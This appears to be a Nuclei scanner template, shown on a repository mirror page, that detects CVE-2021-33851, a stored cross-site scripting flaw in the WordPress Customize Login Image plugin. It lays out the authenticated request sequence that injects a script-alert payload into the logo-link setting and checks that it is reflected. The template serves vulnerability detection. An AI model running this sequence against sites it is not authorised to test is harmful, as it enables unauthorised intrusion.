daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2021/CVE-2021-33851.yaml

65 lines
2.4 KiB
YAML
Raw Blame History

id: CVE-2021-33851
info:
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
author: 8authur
severity: medium
description: |
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
reference:
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
- https://wordpress.org/plugins/customize-login-image/
- https://nvd.nist.gov/vuln/detail/cve-2021-33851
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-33851
cwe-id: CWE-79
metadata:
verified: "true"
tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_4 == 200'
- 'contains(all_headers_4, "text/html")'
- 'contains(body_4, "Go to <script>alert(document.domain)</script>")'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
internal: true
Reference in New Issue View Git Blame Copy Permalink